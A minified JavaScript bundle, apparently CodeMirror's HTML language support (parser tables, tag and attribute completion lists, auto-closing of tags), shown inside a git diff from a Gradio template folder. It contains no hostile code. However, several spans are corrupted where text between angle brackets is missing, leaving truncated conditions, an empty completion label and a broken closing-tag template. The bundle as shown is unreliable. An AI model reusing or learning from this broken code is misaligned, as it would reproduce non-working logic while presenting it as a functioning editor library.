l=t.dialectEnabled(Fe)||it(t.context);e.acceptToken(l?Ge:D,2)}else e.next==v&&e.acceptToken(D,1)});function B(e,t,l){let a=2+e.length;return new q(r=>{for(let n=0,o=0,O=0;;O++){if(r.next<0){O&&r.acceptToken(t);break}if(n==0&&r.next==Oe||n==1&&r.next==M||n>=2&&no?r.acceptToken(t,-o):r.acceptToken(l,-(o-2));break}else if((r.next==10||r.next==13)&&O){r.acceptToken(t,1);break}else n=o=0;r.advance()}})}const pt=B("script",Xe,ke),ct=B("style",Ye,Me),dt=B("textarea",Be,Ee),ft=Te({"Text RawText":S.content,"StartTag StartCloseTag SelfClosingEndTag EndTag":S.angleBracket,TagName:S.tagName,"MismatchedCloseTag/TagName":[S.tagName,S.invalid],AttributeName:S.attributeName,"AttributeValue UnquotedAttributeValue":S.attributeValue,Is:S.definitionOperator,"EntityReference CharacterReference":S.character,Comment:S.blockComment,ProcessingInst:S.processingInstruction,DoctypeDecl:S.documentMeta}),ht=Pe.deserialize({version:14,states:",xOVO!rOOO!WQ#tO'#CqO!]Q#tO'#CzO!bQ#tO'#C}O!gQ#tO'#DQO!lQ#tO'#DSO!qOaO'#CpO!|ObO'#CpO#XOdO'#CpO$eO!rO'#CpOOO`'#Cp'#CpO$lO$fO'#DTO$tQ#tO'#DVO$yQ#tO'#DWOOO`'#Dk'#DkOOO`'#DY'#DYQVO!rOOO%OQ&rO,59]O%WQ&rO,59fO%`Q&rO,59iO%hQ&rO,59lO%sQ&rO,59nOOOa'#D^'#D^O%{OaO'#CxO&WOaO,59[OOOb'#D_'#D_O&`ObO'#C{O&kObO,59[OOOd'#D`'#D`O&sOdO'#DOO'OOdO,59[OOO`'#Da'#DaO'WO!rO,59[O'_Q#tO'#DROOO`,59[,59[OOOp'#Db'#DbO'dO$fO,59oOOO`,59o,59oO'lQ#|O,59qO'qQ#|O,59rOOO`-E7W-E7WO'vQ&rO'#CsOOQW'#DZ'#DZO(UQ&rO1G.wOOOa1G.w1G.wO(^Q&rO1G/QOOOb1G/Q1G/QO(fQ&rO1G/TOOOd1G/T1G/TO(nQ&rO1G/WOOO`1G/W1G/WOOO`1G/Y1G/YO(yQ&rO1G/YOOOa-E7[-E7[O)RQ#tO'#CyOOO`1G.v1G.vOOOb-E7]-E7]O)WQ#tO'#C|OOOd-E7^-E7^O)]Q#tO'#DPOOO`-E7_-E7_O)bQ#|O,59mOOOp-E7`-E7`OOO`1G/Z1G/ZOOO`1G/]1G/]OOO`1G/^1G/^O)gQ,UO,59_OOQW-E7X-E7XOOOa7+$c7+$cOOOb7+$l7+$lOOOd7+$o7+$oOOO`7+$r7+$rOOO`7+$t7+$tO)rQ#|O,59eO)wQ#|O,59hO)|Q#|O,59kOOO`1G/X1G/XO*RO7[O'#CvO*dOMhO'#CvOOQW1G.y1G.yOOO`1G/P1G/POOO`1G/S1G/SOOO`1G/V1G/VOOOO'#D['#D[O*uO7[O,59bOOQW,59b,59bOOOO'#D]'#D]O+WOMhO,59bOOOO-E7Y-E7YOOQW1G.|1G.|OOOO-E7Z-E7Z",stateData:"+s~O!^OS~OUSOVPOWQOXROYTO[]O][O^^O`^Oa^Ob^Oc^Ox^O{_O!dZO~OfaO~OfbO~OfcO~OfdO~OfeO~O!WfOPlP!ZlP~O!XiOQoP!ZoP~O!YlORrP!ZrP~OUSOVPOWQOXROYTOZqO[]O][O^^O`^Oa^Ob^Oc^Ox^O!dZO~O!ZrO~P#dO![sO!euO~OfvO~OfwO~OS|OhyO~OS!OOhyO~OS!QOhyO~OS!SOT!TOhyO~OS!TOhyO~O!WfOPlX!ZlX~OP!WO!Z!XO~O!XiOQoX!ZoX~OQ!ZO!Z!XO~O!YlORrX!ZrX~OR!]O!Z!XO~O!Z!XO~P#dOf!_O~O![sO!e!aO~OS!bO~OS!cO~Oi!dOSgXhgXTgX~OS!fOhyO~OS!gOhyO~OS!hOhyO~OS!iOT!jOhyO~OS!jOhyO~Of!kO~Of!lO~Of!mO~OS!nO~Ok!qO!`!oO!b!pO~OS!rO~OS!sO~OS!tO~Oa!uOb!uOc!uO!`!wO!a!uO~Oa!xOb!xOc!xO!b!wO!c!xO~Oa!uOb!uOc!uO!`!{O!a!uO~Oa!xOb!xOc!xO!b!{O!c!xO~OT~bac!dx{!d~",goto:"%p!`PPPPPPPPPPPPPPPPPPPP!a!gP!mPP!yP!|#P#S#Y#]#`#f#i#l#r#x!aP!a!aP$O$U$l$r$x%O%U%[%bPPPPPPPP%hX^OX`pXUOX`pezabcde{}!P!R!UR!q!dRhUR!XhXVOX`pRkVR!XkXWOX`pRnWR!XnXXOX`pQrXR!XpXYOX`pQ`ORx`Q{aQ}bQ!PcQ!RdQ!UeZ!e{}!P!R!UQ!v!oR!z!vQ!y!pR!|!yQgUR!VgQjVR!YjQmWR![mQpXR!^pQtZR!`tS_O`ToXp",nodeNames:"⚠ StartCloseTag StartCloseTag StartCloseTag EndTag SelfClosingEndTag StartTag StartTag StartTag StartTag StartTag StartCloseTag StartCloseTag StartCloseTag IncompleteCloseTag Document Text EntityReference CharacterReference InvalidEntity Element OpenTag TagName Attribute AttributeName Is AttributeValue UnquotedAttributeValue ScriptText CloseTag OpenTag StyleText CloseTag OpenTag TextareaText CloseTag OpenTag CloseTag SelfClosingTag Comment ProcessingInst MismatchedCloseTag CloseTag DoctypeDecl",maxTerm:67,context:st,nodeProps:[["closedBy",-10,1,2,3,7,8,9,10,11,12,13,"EndTag",6,"EndTag SelfClosingEndTag",-4,21,30,33,36,"CloseTag"],["openedBy",4,"StartTag StartCloseTag",5,"StartTag",-4,29,32,35,37,"OpenTag"],["group",-9,14,17,18,19,20,39,40,41,42,"Entity",16,"Entity TextContent",-3,28,31,34,"TextContent Entity"]],propSources:[ft],skippedNodes:[0],repeatNodeCount:9,tokenData:"#%g!aR!YOX$qXY,QYZ,QZ[$q[]&X]^,Q^p$qpq,Qqr-_rs4ysv-_vw5iwxJ^x}-_}!OKP!O!P-_!P!Q$q!Q![-_![!]!!O!]!^-_!^!_!&W!_!`#$o!`!a&X!a!c-_!c!}!!O!}#R-_#R#S!!O#S#T3V#T#o!!O#o#s-_#s$f$q$f%W-_%W%o!!O%o%p-_%p&a!!O&a&b-_&b1p!!O1p4U-_4U4d!!O4d4e-_4e$IS!!O$IS$I`-_$I`$Ib!!O$Ib$Kh-_$Kh%#t!!O%#t&/x-_&/x&Et!!O&Et&FV-_&FV;'S!!O;'S;:j!&Q;:j;=`4s<%l?&r-_?&r?Ah!!O?Ah?BY$q?BY?Mn!!O?MnO$q!Z$|c`PkW!a`!cpOX$qXZ&XZ[$q[^&X^p$qpq&Xqr$qrs&}sv$qvw+Pwx(tx!^$q!^!_*V!_!a&X!a#S$q#S#T&X#T;'S$q;'S;=`+z<%lO$q!R&bX`P!a`!cpOr&Xrs&}sv&Xwx(tx!^&X!^!_*V!_;'S&X;'S;=`*y<%lO&Xq'UV`P!cpOv&}wx'kx!^&}!^!_(V!_;'S&};'S;=`(n<%lO&}P'pT`POv'kw!^'k!_;'S'k;'S;=`(P<%lO'kP(SP;=`<%l'kp([S!cpOv(Vx;'S(V;'S;=`(h<%lO(Vp(kP;=`<%l(Vq(qP;=`<%l&}a({W`P!a`Or(trs'ksv(tw!^(t!^!_)e!_;'S(t;'S;=`*P<%lO(t`)jT!a`Or)esv)ew;'S)e;'S;=`)y<%lO)e`)|P;=`<%l)ea*SP;=`<%l(t!Q*^V!a`!cpOr*Vrs(Vsv*Vwx)ex;'S*V;'S;=`*s<%lO*V!Q*vP;=`<%l*V!R*|P;=`<%l&XW+UYkWOX+PZ[+P^p+Pqr+Psw+Px!^+P!a#S+P#T;'S+P;'S;=`+t<%lO+PW+wP;=`<%l+P!Z+}P;=`<%l$q!a,]``P!a`!cp!^^OX&XXY,QYZ,QZ]&X]^,Q^p&Xpq,Qqr&Xrs&}sv&Xwx(tx!^&X!^!_*V!_;'S&X;'S;=`*y<%lO&X!_-ljhS`PkW!a`!cpOX$qXZ&XZ[$q[^&X^p$qpq&Xqr-_rs&}sv-_vw/^wx(tx!P-_!P!Q$q!Q!^-_!^!_1n!_!a&X!a#S-_#S#T3V#T#s-_#s$f$q$f;'S-_;'S;=`4s<%l?Ah-_?Ah?BY$q?BY?Mn-_?MnO$q[/echSkWOX+PZ[+P^p+Pqr/^sw/^x!P/^!P!Q+P!Q!^/^!^!_0p!a#S/^#S#T0p#T#s/^#s$f+P$f;'S/^;'S;=`1h<%l?Ah/^?Ah?BY+P?BY?Mn/^?MnO+PS0uXhSqr0psw0px!P0p!Q!_0p!a#s0p$f;'S0p;'S;=`1b<%l?Ah0p?BY?Mn0pS1eP;=`<%l0p[1kP;=`<%l/^!U1wbhS!a`!cpOq*Vqr1nrs(Vsv1nvw0pwx)ex!P1n!P!Q*V!Q!_1n!_!a*V!a#s1n#s$f*V$f;'S1n;'S;=`3P<%l?Ah1n?Ah?BY*V?BY?Mn1n?MnO*V!U3SP;=`<%l1n!V3bchS`P!a`!cpOq&Xqr3Vrs&}sv3Vvw0pwx(tx!P3V!P!Q&X!Q!^3V!^!_1n!_!a&X!a#s3V#s$f&X$f;'S3V;'S;=`4m<%l?Ah3V?Ah?BY&X?BY?Mn3V?MnO&X!V4pP;=`<%l3V!_4vP;=`<%l-_!Z5SV!`h`P!cpOv&}wx'kx!^&}!^!_(V!_;'S&};'S;=`(n<%lO&}!_5rjhSkWc!ROX7dXZ8qZ[7d[^8q^p7dqr:crs8qst@Ttw:cwx8qx!P:c!P!Q7d!Q!]:c!]!^/^!^!_=p!_!a8q!a#S:c#S#T=p#T#s:c#s$f7d$f;'S:c;'S;=`?}<%l?Ah:c?Ah?BY7d?BY?Mn:c?MnO7d!Z7ibkWOX7dXZ8qZ[7d[^8q^p7dqr7drs8qst+Ptw7dwx8qx!]7d!]!^9f!^!a8q!a#S7d#S#T8q#T;'S7d;'S;=`:]<%lO7d!R8tVOp8qqs8qt!]8q!]!^9Z!^;'S8q;'S;=`9`<%lO8q!R9`Oa!R!R9cP;=`<%l8q!Z9mYkWa!ROX+PZ[+P^p+Pqr+Psw+Px!^+P!a#S+P#T;'S+P;'S;=`+t<%lO+P!Z:`P;=`<%l7d!_:jjhSkWOX7dXZ8qZ[7d[^8q^p7dqr:crs8qst/^tw:cwx8qx!P:c!P!Q7d!Q!]:c!]!^<[!^!_=p!_!a8q!a#S:c#S#T=p#T#s:c#s$f7d$f;'S:c;'S;=`?}<%l?Ah:c?Ah?BY7d?BY?Mn:c?MnO7d!_b#d#s1n#s$f*V$f;'S1n;'S;=`3P<%l?Ah1n?Ah?BY*V?BY?Mn1n?MnO*V!V!>kdhS!a`!cpOq*Vqr1nrs(Vsv1nvw0pwx)ex!P1n!P!Q*V!Q!_1n!_!a*V!a#V1n#V#W!?y#W#s1n#s$f*V$f;'S1n;'S;=`3P<%l?Ah1n?Ah?BY*V?BY?Mn1n?MnO*V!V!@SdhS!a`!cpOq*Vqr1nrs(Vsv1nvw0pwx)ex!P1n!P!Q*V!Q!_1n!_!a*V!a#h1n#h#i!Ab#i#s1n#s$f*V$f;'S1n;'S;=`3P<%l?Ah1n?Ah?BY*V?BY?Mn1n?MnO*V!V!AkdhS!a`!cpOq*Vqr1nrs(Vsv1nvw0pwx)ex!P1n!P!Q*V!Q!_1n!_!a*V!a#m1n#m#n!By#n#s1n#s$f*V$f;'S1n;'S;=`3P<%l?Ah1n?Ah?BY*V?BY?Mn1n?MnO*V!V!CSdhS!a`!cpOq*Vqr1nrs(Vsv1nvw0pwx)ex!P1n!P!Q*V!Q!_1n!_!a*V!a#d1n#d#e!Db#e#s1n#s$f*V$f;'S1n;'S;=`3P<%l?Ah1n?Ah?BY*V?BY?Mn1n?MnO*V!V!DkdhS!a`!cpOq*Vqr1nrs(Vsv1nvw0pwx)ex!P1n!P!Q*V!Q!_1n!_!a*V!a#X1n#X#Y!5]#Y#s1n#s$f*V$f;'S1n;'S;=`3P<%l?Ah1n?Ah?BY*V?BY?Mn1n?MnO*V!V!FSchS!a`!cpOq!G_qr!Eyrs!HUsv!Eyvw!Ncwx!Jvx!P!Ey!P!Q!G_!Q!_!Ey!_!a!G_!a!b##T!b#s!Ey#s$f!G_$f;'S!Ey;'S;=`#$i<%l?Ah!Ey?Ah?BY!G_?BY?Mn!Ey?MnO!G_!R!GfY!a`!cpOr!G_rs!HUsv!G_vw!Hpwx!Jvx!a!G_!a!b!Lv!b;'S!G_;'S;=`!N]<%lO!G_q!HZV!cpOv!HUvx!Hpx!a!HU!a!b!Iq!b;'S!HU;'S;=`!Jp<%lO!HUP!HsTO!a!Hp!a!b!IS!b;'S!Hp;'S;=`!Ik<%lO!HpP!IVTO!`!Hp!`!a!If!a;'S!Hp;'S;=`!Ik<%lO!HpP!IkOxPP!InP;=`<%l!Hpq!IvV!cpOv!HUvx!Hpx!`!HU!`!a!J]!a;'S!HU;'S;=`!Jp<%lO!HUq!JdS!cpxPOv(Vx;'S(V;'S;=`(h<%lO(Vq!JsP;=`<%l!HUa!J{X!a`Or!Jvrs!Hpsv!Jvvw!Hpw!a!Jv!a!b!Kh!b;'S!Jv;'S;=`!Lp<%lO!Jva!KmX!a`Or!Jvrs!Hpsv!Jvvw!Hpw!`!Jv!`!a!LY!a;'S!Jv;'S;=`!Lp<%lO!Jva!LaT!a`xPOr)esv)ew;'S)e;'S;=`)y<%lO)ea!LsP;=`<%l!Jv!R!L}Y!a`!cpOr!G_rs!HUsv!G_vw!Hpwx!Jvx!`!G_!`!a!Mm!a;'S!G_;'S;=`!N]<%lO!G_!R!MvV!a`!cpxPOr*Vrs(Vsv*Vwx)ex;'S*V;'S;=`*s<%lO*V!R!N`P;=`<%l!G_T!NhbhSOq!Hpqr!Ncrs!Hpsw!Ncwx!Hpx!P!Nc!P!Q!Hp!Q!_!Nc!_!a!Hp!a!b# p!b#s!Nc#s$f!Hp$f;'S!Nc;'S;=`#!}<%l?Ah!Nc?Ah?BY!Hp?BY?Mn!Nc?MnO!HpT# ubhSOq!Hpqr!Ncrs!Hpsw!Ncwx!Hpx!P!Nc!P!Q!Hp!Q!_!Nc!_!`!Hp!`!a!If!a#s!Nc#s$f!Hp$f;'S!Nc;'S;=`#!}<%l?Ah!Nc?Ah?BY!Hp?BY?Mn!Nc?MnO!HpT##QP;=`<%l!Nc!V##^chS!a`!cpOq!G_qr!Eyrs!HUsv!Eyvw!Ncwx!Jvx!P!Ey!P!Q!G_!Q!_!Ey!_!`!G_!`!a!Mm!a#s!Ey#s$f!G_$f;'S!Ey;'S;=`#$i<%l?Ah!Ey?Ah?BY!G_?BY?Mn!Ey?MnO!G_!V#$lP;=`<%l!Ey!V#$zXiS`P!a`!cpOr&Xrs&}sv&Xwx(tx!^&X!^!_*V!_;'S&X;'S;=`*y<%lO&X",tokenizers:[pt,ct,dt,ut,ot,Ot,0,1,2,3,4,5],topRules:{Document:[0,15]},dialects:{noMatch:0,selfClosing:485},tokenPrec:487});function ie(e,t){let l=Object.create(null);for(let a of e.getChildren(re)){let r=a.getChild(Ie),n=a.getChild(k)||a.getChild(ne);r&&(l[t.read(r.from,r.to)]=n?n.type.id==k?t.read(n.from+1,n.to-1):t.read(n.from,n.to):"")}return l}function U(e,t){let l=e.getChild(He);return l?t.read(l.from,l.to):" "}function C(e,t,l){let a;for(let r of l)if(!r.attrs||r.attrs(a||(a=ie(e.node.parent.firstChild,t))))return{parser:r.parser};return null}function ue(e=[],t=[]){let l=[],a=[],r=[],n=[];for(let O of e)(O.tag=="script"?l:O.tag=="style"?a:O.tag=="textarea"?r:n).push(O);let o=t.length?Object.create(null):null;for(let O of t)(o[O.name]||(o[O.name]=[])).push(O);return be((O,p)=>{let h=O.type.id;if(h==Ue)return C(O,p,l);if(h==je)return C(O,p,a);if(h==Je)return C(O,p,r);if(h==se&&n.length){let i=O.node,u=U(i,p),c;for(let d of n)if(d.tag==u&&(!d.attrs||d.attrs(c||(c=ie(i,p))))){let f=i.parent.lastChild;return{parser:d.parser,overlay:[{from:O.to,to:f.type.id==Le?f.from:i.parent.to}]}}}if(o&&h==re){let i=O.node,u;if(u=i.firstChild){let c=o[p.read(u.from,u.to)];if(c)for(let d of c){if(d.tagName&&d.tagName!=U(i.parent,p))continue;let f=i.lastChild;if(f.type.id==k){let P=f.from+1,T=f.lastChild,x=f.to-(T&&T.isError?0:1);if(x>P)return{parser:d.parser,overlay:[{from:P,to:x}]}}else if(f.type.id==ne)return{parser:d.parser,overlay:[{from:f.from,to:f.to}]}}}}return null})}const b=["_blank","_self","_top","_parent"],Q=["ascii","utf-8","utf-16","latin1","latin1"],A=["get","post","put","delete"],X=["application/x-www-form-urlencoded","multipart/form-data","text/plain"],m=["true","false"],s={},mt={a:{attrs:{href:null,ping:null,type:null,media:null,target:b,hreflang:null}},abbr:s,address:s,area:{attrs:{alt:null,coords:null,href:null,target:null,ping:null,media:null,hreflang:null,type:null,shape:["default","rect","circle","poly"]}},article:s,aside:s,audio:{attrs:{src:null,mediagroup:null,crossorigin:["anonymous","use-credentials"],preload:["none","metadata","auto"],autoplay:["autoplay"],loop:["loop"],controls:["controls"]}},b:s,base:{attrs:{href:null,target:b}},bdi:s,bdo:s,blockquote:{attrs:{cite:null}},body:s,br:s,button:{attrs:{form:null,formaction:null,name:null,value:null,autofocus:["autofocus"],disabled:["autofocus"],formenctype:X,formmethod:A,formnovalidate:["novalidate"],formtarget:b,type:["submit","reset","button"]}},canvas:{attrs:{width:null,height:null}},caption:s,center:s,cite:s,code:s,col:{attrs:{span:null}},colgroup:{attrs:{span:null}},command:{attrs:{type:["command","checkbox","radio"],label:null,icon:null,radiogroup:null,command:null,title:null,disabled:["disabled"],checked:["checked"]}},data:{attrs:{value:null}},datagrid:{attrs:{disabled:["disabled"],multiple:["multiple"]}},datalist:{attrs:{data:null}},dd:s,del:{attrs:{cite:null,datetime:null}},details:{attrs:{open:["open"]}},dfn:s,div:s,dl:s,dt:s,em:s,embed:{attrs:{src:null,type:null,width:null,height:null}},eventsource:{attrs:{src:null}},fieldset:{attrs:{disabled:["disabled"],form:null,name:null}},figcaption:s,figure:s,footer:s,form:{attrs:{action:null,name:null,"accept-charset":Q,autocomplete:["on","off"],enctype:X,method:A,novalidate:["novalidate"],target:b}},h1:s,h2:s,h3:s,h4:s,h5:s,h6:s,head:{children:["title","base","link","style","meta","script","noscript","command"]},header:s,hgroup:s,hr:s,html:{attrs:{manifest:null}},i:s,iframe:{attrs:{src:null,srcdoc:null,name:null,width:null,height:null,sandbox:["allow-top-navigation","allow-same-origin","allow-forms","allow-scripts"],seamless:["seamless"]}},img:{attrs:{alt:null,src:null,ismap:null,usemap:null,width:null,height:null,crossorigin:["anonymous","use-credentials"]}},input:{attrs:{alt:null,dirname:null,form:null,formaction:null,height:null,list:null,max:null,maxlength:null,min:null,name:null,pattern:null,placeholder:null,size:null,src:null,step:null,value:null,width:null,accept:["audio/*","video/*","image/*"],autocomplete:["on","off"],autofocus:["autofocus"],checked:["checked"],disabled:["disabled"],formenctype:X,formmethod:A,formnovalidate:["novalidate"],formtarget:b,multiple:["multiple"],readonly:["readonly"],required:["required"],type:["hidden","text","search","tel","url","email","password","datetime","date","month","week","time","datetime-local","number","range","color","checkbox","radio","file","submit","image","reset","button"]}},ins:{attrs:{cite:null,datetime:null}},kbd:s,keygen:{attrs:{challenge:null,form:null,name:null,autofocus:["autofocus"],disabled:["disabled"],keytype:["RSA"]}},label:{attrs:{for:null,form:null}},legend:s,li:{attrs:{value:null}},link:{attrs:{href:null,type:null,hreflang:null,media:null,sizes:["all","16x16","16x16 32x32","16x16 32x32 64x64"]}},map:{attrs:{name:null}},mark:s,menu:{attrs:{label:null,type:["list","context","toolbar"]}},meta:{attrs:{content:null,charset:Q,name:["viewport","application-name","author","description","generator","keywords"],"http-equiv":["content-language","content-type","default-style","refresh"]}},meter:{attrs:{value:null,min:null,low:null,high:null,max:null,optimum:null}},nav:s,noscript:s,object:{attrs:{data:null,type:null,name:null,usemap:null,form:null,width:null,height:null,typemustmatch:["typemustmatch"]}},ol:{attrs:{reversed:["reversed"],start:null,type:["1","a","A","i","I"]},children:["li","script","template","ul","ol"]},optgroup:{attrs:{disabled:["disabled"],label:null}},option:{attrs:{disabled:["disabled"],label:null,selected:["selected"],value:null}},output:{attrs:{for:null,form:null,name:null}},p:s,param:{attrs:{name:null,value:null}},pre:s,progress:{attrs:{value:null,max:null}},q:{attrs:{cite:null}},rp:s,rt:s,ruby:s,samp:s,script:{attrs:{type:["text/javascript"],src:null,async:["async"],defer:["defer"],charset:Q}},section:s,select:{attrs:{form:null,name:null,size:null,autofocus:["autofocus"],disabled:["disabled"],multiple:["multiple"]}},slot:{attrs:{name:null}},small:s,source:{attrs:{src:null,type:null,media:null}},span:s,strong:s,style:{attrs:{type:["text/css"],media:null,scoped:null}},sub:s,summary:s,sup:s,table:s,tbody:s,td:{attrs:{colspan:null,rowspan:null,headers:null}},template:s,textarea:{attrs:{dirname:null,form:null,maxlength:null,name:null,placeholder:null,rows:null,cols:null,autofocus:["autofocus"],disabled:["disabled"],readonly:["readonly"],required:["required"],wrap:["soft","hard"]}},tfoot:s,th:{attrs:{colspan:null,rowspan:null,headers:null,scope:["row","col","rowgroup","colgroup"]}},thead:s,time:{attrs:{datetime:null}},title:s,tr:s,track:{attrs:{src:null,label:null,default:null,kind:["subtitles","captions","descriptions","chapters","metadata"],srclang:null}},ul:{children:["li","script","template","ul","ol"]},var:s,video:{attrs:{src:null,poster:null,width:null,height:null,crossorigin:["anonymous","use-credentials"],preload:["auto","metadata","none"],autoplay:["autoplay"],mediagroup:["movie"],muted:["muted"],controls:["controls"]}},wbr:s},pe={accesskey:null,class:null,contenteditable:m,contextmenu:null,dir:["ltr","rtl","auto"],draggable:["true","false","auto"],dropzone:["copy","move","link","string:","file:"],hidden:["hidden"],id:null,inert:["inert"],itemid:null,itemprop:null,itemref:null,itemscope:["itemscope"],itemtype:null,lang:["ar","bn","de","en-GB","en-US","es","fr","hi","id","ja","pa","pt","ru","tr","zh"],spellcheck:m,autocorrect:m,autocapitalize:m,style:null,tabindex:null,title:null,translate:["yes","no"],rel:["stylesheet","alternate","author","bookmark","help","license","next","nofollow","noreferrer","prefetch","prev","search","tag"],role:"alert application article banner button cell checkbox complementary contentinfo dialog document feed figure form grid gridcell heading img list listbox listitem main navigation region row rowgroup search switch tab table tabpanel textbox timer".split(" "),"aria-activedescendant":null,"aria-atomic":m,"aria-autocomplete":["inline","list","both","none"],"aria-busy":m,"aria-checked":["true","false","mixed","undefined"],"aria-controls":null,"aria-describedby":null,"aria-disabled":m,"aria-dropeffect":null,"aria-expanded":["true","false","undefined"],"aria-flowto":null,"aria-grabbed":["true","false","undefined"],"aria-haspopup":m,"aria-hidden":m,"aria-invalid":["true","false","grammar","spelling"],"aria-label":null,"aria-labelledby":null,"aria-level":null,"aria-live":["off","polite","assertive"],"aria-multiline":m,"aria-multiselectable":m,"aria-owns":null,"aria-posinset":null,"aria-pressed":["true","false","mixed","undefined"],"aria-readonly":m,"aria-relevant":null,"aria-required":m,"aria-selected":["true","false","undefined"],"aria-setsize":null,"aria-sort":["ascending","descending","none","other"],"aria-valuemax":null,"aria-valuemin":null,"aria-valuenow":null,"aria-valuetext":null},ce="beforeunload copy cut dragstart dragover dragleave dragenter dragend drag paste focus blur change click load mousedown mouseenter mouseleave mouseup keydown keyup resize scroll unload".split(" ").map(e=>"on"+e);for(let e of ce)pe[e]=null;class V{constructor(t,l){this.tags=Object.assign(Object.assign({},mt),t),this.globalAttrs=Object.assign(Object.assign({},pe),l),this.allTags=Object.keys(this.tags),this.globalAttrNames=Object.keys(this.globalAttrs)}}V.default=new V;function g(e,t,l=e.length){if(!t)return"";let a=t.firstChild,r=a&&a.getChild("TagName");return r?e.sliceString(r.from,Math.min(r.to,l)):""}function $(e,t=!1){for(let l=e.parent;l;l=l.parent)if(l.name=="Element")if(t)t=!1;else return l;return null}function de(e,t,l){let a=l.tags[g(e,$(t,!0))];return a?.children||l.allTags}function E(e,t){let l=[];for(let a=t;a=$(a);){let r=g(e,a);if(r&&a.lastChild.name=="CloseTag")break;r&&l.indexOf(r)<0&&(t.name=="EndTag"||t.from>=a.firstChild.to)&&l.push(r)}return l}const fe=/^[:\-\.\w\u00b7-\uffff]*$/;function j(e,t,l,a,r){let n=/\s*>/.test(e.sliceDoc(r,r+5))?"":">";return{from:a,to:r,options:de(e.doc,l,t).map(o=>({label:o,type:"type"})).concat(E(e.doc,l).map((o,O)=>({label:"/"+o,apply:"/"+o+n,type:"type",boost:99-O}))),validFor:/^\/?[:\-\.\w\u00b7-\uffff]*$/}}function J(e,t,l,a){let r=/\s*>/.test(e.sliceDoc(a,a+5))?"":">";return{from:l,to:a,options:E(e.doc,t).map((n,o)=>({label:n,apply:n+r,type:"type",boost:99-o})),validFor:fe}}function St(e,t,l,a){let r=[],n=0;for(let o of de(e.doc,l,t))r.push({label:"<"+o,type:"type"});for(let o of E(e.doc,l))r.push({label:"",type:"type",boost:99-n++});return{from:a,to:a,options:r,validFor:/^<\/?[:\-\.\w\u00b7-\uffff]*$/}}function gt(e,t,l,a,r){let n=$(l),o=n?t.tags[g(e.doc,n)]:null,O=o&&o.attrs?Object.keys(o.attrs):[],p=o&&o.globalAttrs===!1?O:O.length?O.concat(t.globalAttrNames):t.globalAttrNames;return{from:a,to:r,options:p.map(h=>({label:h,type:"property"})),validFor:fe}}function Pt(e,t,l,a,r){var n;let o=(n=l.parent)===null||n===void 0?void 0:n.getChild("AttributeName"),O=[],p;if(o){let h=e.sliceDoc(o.from,o.to),i=t.globalAttrs[h];if(!i){let u=$(l),c=u?t.tags[g(e.doc,u)]:null;i=c?.attrs&&c.attrs[h]}if(i){let u=e.sliceDoc(a,r).toLowerCase(),c='"',d='"';/^['"]/.test(u)?(p=u[0]=='"'?/^[^"]*$/:/^[^']*$/,c="",d=e.sliceDoc(r,r+1)==u[0]?"":u[0],u=u.slice(1),a++):p=/^[^\s<>='"]*$/;for(let f of i)O.push({label:f,apply:c+f+d,type:"constant"})}}return{from:a,to:r,options:O,validFor:p}}function he(e,t){let{state:l,pos:a}=t,r=z(l).resolveInner(a),n=r.resolve(a,-1);for(let o=a,O;r==n&&(O=n.childBefore(o));){let p=O.lastChild;if(!p||!p.type.isError||p.fromhe(a,r)}const me=[{tag:"script",attrs:e=>e.type=="text/typescript"||e.lang=="ts",parser:we.parser},{tag:"script",attrs:e=>e.type=="text/babel"||e.type=="text/jsx",parser:Ce.parser},{tag:"script",attrs:e=>e.type=="text/typescript-jsx",parser:Qe.parser},{tag:"script",attrs(e){return!e.type||/^(?:text|application)\/(?:x-)?(?:java|ecma)script$|^module$|^$/i.test(e.type)},parser:K.parser},{tag:"style",attrs(e){return(!e.lang||e.lang=="css")&&(!e.type||/^(text\/)?(x-)?(stylesheet|css)$/i.test(e.type))},parser:F.parser}],Se=[{name:"style",parser:F.parser.configure({top:"Styles"})}].concat(ce.map(e=>({name:e,parser:K.parser}))),_=Ve.define({name:"html",parser:ht.configure({props:[xe.add({Element(e){let t=/^(\s*)(<\/)?/.exec(e.textAfter);return e.node.to<=e.pos+t[0].length?e.continue():e.lineIndent(e.node.from)+(t[2]?0:e.unit)},"OpenTag CloseTag SelfClosingTag"(e){return e.column(e.node.from)+e.unit},Document(e){if(e.pos+/\s*/.exec(e.textAfter)[0].lengthe.getChild("TagName")})],wrap:ue(me,Se)}),languageData:{commentTokens:{block:{open:""}},indentOnInput:/^\s*<\/\w+\W$/,wordChars:"-._"}});function Yt(e={}){let t="",l;e.matchClosingTags===!1&&(t="noMatch"),e.selfClosingTags===!0&&(t=(t?t+" ":"")+"selfClosing"),(e.nestedLanguages&&e.nestedLanguages.length||e.nestedAttributes&&e.nestedAttributes.length)&&(l=ue((e.nestedLanguages||[]).concat(me),(e.nestedAttributes||[]).concat(Se)));let a=l||t?_.configure({dialect:t,wrap:l}):_;return new ve(a,[_.data.of({autocomplete:Tt(e)}),e.autoCloseTags!==!1?bt:[],Ae().support,$e().support])}const L=new Set("area base br col command embed frame hr img input keygen link meta param source track wbr menuitem".split(" ")),bt=qe.inputHandler.of((e,t,l,a)=>{if(e.composing||e.state.readOnly||t!=l||a!=">"&&a!="/"||!_.isActiveAt(e.state,t,-1))return!1;let{state:r}=e,n=r.changeByRange(o=>{var O,p,h;let{head:i}=o,u=z(r).resolveInner(i,-1),c;if((u.name=="TagName"||u.name=="StartTag")&&(u=u.parent),a==">"&&u.name=="OpenTag"){if(((p=(O=u.parent)===null||O===void 0?void 0:O.lastChild)===null||p===void 0?void 0:p.name)!="CloseTag"&&(c=g(r.doc,u.parent,i))&&!L.has(c)){let d=e.state.doc.sliceString(i,i+1)===">",f=`${d?"":">"}`;return{range:G.cursor(i+1),changes:{from:i+(d?1:0),insert:f}}}}else if(a=="/"&&u.name=="OpenTag"){let d=u.parent,f=d?.parent;if(d.from==i-1&&((h=f.lastChild)===null||h===void 0?void 0:h.name)!="CloseTag"&&(c=g(r.doc,f,i))&&!L.has(c)){let P=e.state.doc.sliceString(i,i+1)===">",T=`/${c}${P?"":">"}`,x=i+T.length+(P?1:0);return{range:G.cursor(x),changes:{from:i,insert:T}}}}return{range:o}});return n.changes.empty?!1:(e.dispatch(n,{userEvent:"input.type",scrollIntoView:!0}),!0)});export{bt as autoCloseTags,Yt as html,kt as htmlCompletionSource,Tt as htmlCompletionSourceWith,_ as htmlLanguage}; -//# sourceMappingURL=index-9923ca49.js.map diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/index-de9ed39e.css 